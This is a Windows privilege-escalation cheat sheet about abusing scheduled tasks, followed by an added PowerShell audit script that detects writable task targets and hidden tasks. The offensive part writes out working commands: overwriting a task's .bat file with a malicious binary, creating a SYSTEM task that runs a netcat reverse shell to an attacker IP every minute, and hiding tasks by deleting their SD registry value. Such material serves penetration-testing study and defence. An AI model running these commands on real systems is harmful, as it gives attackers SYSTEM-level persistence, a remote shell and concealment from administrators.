# List scheduled tasks
#
schtasks
 
# View details about a scheduled task
#
schtasks /query /tn $TASK_NAME /fo list /v
 
# Check the permissions of an executable
#
icacls $PATH_TO_BINARY
 
# Modify the permissions (if possible/desired)
#
icacls $PATH_TO_BINARY /grant $GROUP:$PERMISSION
 
# You can overwrite files in Windows in the same way you'd do
# in Linux (however, this can cause issues with line
# endings... probably best to just use notepad.exe here
# instead)
#
echo $MALICIOUS_BINARY_AND_ARGUMENTS > $PATH_TO_BAT_TO_OVERWRITE
 
# Force a task to run (only if the current user has permission
# to do so)
#
schtasks /run /tn $TASK_NAME

If a task points to a file that you’ve obtained write access to, then that file can be altered without changing the underlying task.

It may also be possible to create your own tasks.

# Creates a task that executes a netcat reverse shell back to
# the attacker. "/sc" and "/mo" indicate that the task should
# be run every minute. "/ru" indicates that the task will run
# with SYSTEM privileges.
#
schtasks /create /sc minute /mo 1 /tn $TASK_NAME `
	/tr "$NETCAT_PATH -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" `
	/ru SYSTEM
 
# Checks to see if the task was created successfully.
#
schtasks /query /tn $TASK_NAME

Stealthy tasks

Deleting the task's security descriptor (the SD registry value) makes the task invisible to every user on the system. Note that this requires PsExec!

  1. Use PsExec64.exe -s -i regedit to open regedit with SYSTEM privileges.

  2. Search in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ for the task to hide. Under the key for that task, there will be a value named SD that contains the security descriptor. Simply delete it.
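As an added defensive counterpart (not part of the original cheat sheet), the PowerShell audit below covers both findings on this page: it lists task actions whose target file is writable by low-privilege principals, which is the condition the icacls checks above look for, and it lists TaskCache\Tree entries whose SD value is missing, which is the state the regedit step leaves behind. It assumes it runs elevated on the host being reviewed and that `$LowPrivPrincipals` is the set of principals whose write access is a concern.

```powershell
# Added audit script (not from the cheat sheet); run elevated. Assumed principals of concern:
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Any of these rights lets the target file be edited or replaced.
$WriteRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'

function Resolve-TaskExecutable([string]$Execute) {
    # Expand %SystemRoot%-style variables, strip quotes and resolve bare
    # names such as cmd.exe through PATH, as the Task Scheduler would.
    $exe = [Environment]::ExpandEnvironmentVariables($Execute.Trim('"'))
    if (-not [IO.Path]::IsPathRooted($exe)) {
        $cmd = Get-Command $exe -ErrorAction SilentlyContinue
        if ($cmd) { $exe = $cmd.Source }
    }
    if (Test-Path -LiteralPath $exe -PathType Leaf) { return $exe }
}

function Get-LowPrivWritableTaskTargets {
    # One record per task action whose target file a low-priv principal can write.
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }  # e.g. COM handler actions
            $exe = Resolve-TaskExecutable $action.Execute
            if (-not $exe) { continue }
            foreach ($ace in (Get-Acl -LiteralPath $exe).Access) {
                $lowPriv = $LowPrivPrincipals -contains $ace.IdentityReference.Value
                $writes = ($ace.AccessControlType -eq 'Allow') -and (($ace.FileSystemRights -band $WriteRights) -ne 0)
                if ($lowPriv -and $writes) {
                    [pscustomobject]@{
                        Task      = "$($task.TaskPath)$($task.TaskName)"
                        RunAs     = $task.Principal.UserId
                        Target    = $exe
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                    }
                }
            }
        }
    }
}

function Get-TasksMissingSD {
    # Task keys in TaskCache\Tree with no SD value: the state the regedit step above leaves behind.
    $tree = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'
    # Folder keys under Tree have no Id value; real task keys do.
    Get-ChildItem -Path $tree -Recurse |
        Where-Object { $_.GetValue('Id') -and -not $_.GetValue('SD') } |
        ForEach-Object { $_.Name -replace '^.*\\Tree', '' }
}

Get-LowPrivWritableTaskTargets | Format-Table -AutoSize
Get-TasksMissingSD
```

Write access on the target's parent directory (rename and replace) and on files named in the task's arguments, such as a script passed to cmd.exe, matter just as much and are not covered by this check.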